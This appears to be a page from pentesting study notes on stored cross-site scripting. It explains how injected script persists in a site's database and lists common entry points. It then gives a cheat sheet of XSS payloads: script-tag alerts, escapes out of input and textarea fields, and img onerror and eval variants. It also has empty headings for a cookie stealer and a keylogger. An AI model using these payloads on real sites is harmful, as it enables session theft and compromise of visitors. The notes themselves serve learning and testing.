Ctrlk
For the complete documentation index, see llms.txt. This page is also available as Markdown.

XSS Stored

It goes by the same logic of the reflected XSS except that the malicious JavaScript code is directly stored in the web application database and is executed when the user/admin/attacker visits the page where the attacker injected the code. The result is the attacker will grab the session cookie or even establish reverse shell connection. This often happens when a website allows user input that is not sanitized (remove the "bad parts" of a users input) when inserted into the database. A attacker then creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitize that field, when the site displays that field

on the page, it will execute the payload to everyone who visits it. Entry Points

  • Comments on a blog

  • User profile information

  • Website listings

Example Payloads

<script>alert('Hi_threr')</script>
<script>alert(String.fromCharCode(88,83,83))</script>

suitable for escaping input tags

"><script>alert('XSS');</script>

suitable for escaping text areas

</textarea><script>alert('THM');</script>
';alert('THM');//'
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

Cookie Stealer

#OR

keylogger payload that records every keystroke on a certain page

PreviousXSS ReflectedNextDom-based

Last updated